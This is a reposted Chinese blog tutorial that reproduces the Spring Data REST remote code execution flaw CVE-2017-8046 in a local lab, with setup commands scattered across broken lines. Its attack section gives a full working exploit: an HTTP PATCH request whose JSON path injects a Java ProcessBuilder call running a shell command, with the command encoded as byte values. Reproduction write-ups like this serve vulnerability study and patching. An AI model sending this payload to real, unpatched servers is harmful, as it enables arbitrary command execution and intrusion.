Spring Data REST PATCH請求遠程代碼執行漏洞（CVE-2017-8046）本地復現方法

本文轉載自查看原文 2017-10-09 10:52 1456

#1背景

Spring Data REST是Spring Data項目的一部分，可以輕松地在Spring Data存儲庫之上構建超媒體驅動的REST Web服務。

惡意的PATCH請求使用精心構造的JSON數據提交到spring-data-rest服務可以執行任意JAVA代碼

#2 影響范圍

Spring Data REST versions prior to 2.5.12, 2.6.7, 3.0 RC3

可以查看spring-data-rest-webmvc jar包的版本

#3 漏洞本地復現

mvn 安裝

 
                 cd  
                 /opt 
                
                 wget http: 
                 //apache 
                 .mirror.gtcomm.net 
                 /maven/maven-3/3 
                 .5.0 
                 /binaries/apache-maven-3 
                 .5.0-bin.zip 
                
                 unzip apache-maven-3.5.0-bin.zip 
                
                 vim ~/.bash_profile 
                
                 #PATH=/opt/apache-maven-3.5.0/bin:$PATH 
                
                  cd 
                
                 mvn - 
                 v

啟動web服務

 
                  wget https: 
                  //github 
                  .com 
                  /spring-projects/spring-data-examples/archive/master 
                  .zip 
                 
                  unzip master 
                 
                  cd  
                  spring-data-examples-master 
                  /rest/multi-store 
                 
                  mvn spring-boot:run

添加數據

curl -X POST -i -H "Content-Type:application/json" -d '{"firstName":"Greg", "lastName":"Turnquist"}' http://localhost:8080/persons

遠程代碼執行

請求方法為PATCH，Content-Type為 application/json-patch+json

",".join(map(str, (map(ord,"whoami > /tmp/pwn.txt"))))

PATCH /persons/1 HTTP/1.1
Host: 192.168.1.108:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 325
 
[{ "op": "replace", "path": "(new  java.lang.ProcessBuilder(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,98,97,115,104}),new java.lang.String(new byte[]{45,99}), new java.lang.String(new byte[]{119,104,111,97,109,105,32,62,32,47,116,109,112,47,112,119,110,46,116,120,116}))).start().x", "value": "Zhang" }]

參考

https://tech.meituan.com/Spring_Data_REST_%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E(CVE-2017-8046)_%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0.html

https://github.com/spring-projects/spring-data-examples/tree/master/rest/multi-store

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 漏洞復現 - Spring Data Rest 遠程命令執行漏洞（CVE-2017-8046） CVE-2017-8046 復現與分析 Samba遠程代碼執行漏洞(CVE-2017-7494)復現漏洞復現-CVE-2017-7525-Jackson遠程代碼執行 Tomcat遠程代碼執行漏洞CVE-2017-12615復現 Office遠程代碼執行漏洞CVE-2017-0199復現 Samba遠程代碼執行漏洞(CVE-2017-7494)復現漏洞復現-CVE-2017-4971-Spring Web Flow 遠程代碼執行漏洞復現-CVE-2016-4977-Spring遠程代碼執行漏洞復現-Office遠程代碼執行漏洞 (CVE-2017-11882&CVE-2018-0802)

Spring Data REST PATCH請求遠程代碼執行漏洞（CVE-2017-8046） 本地復現方法

#1背景

#2 影響范圍

#3 漏洞本地復現

免責聲明！

Spring Data REST PATCH請求遠程代碼執行漏洞（CVE-2017-8046）本地復現方法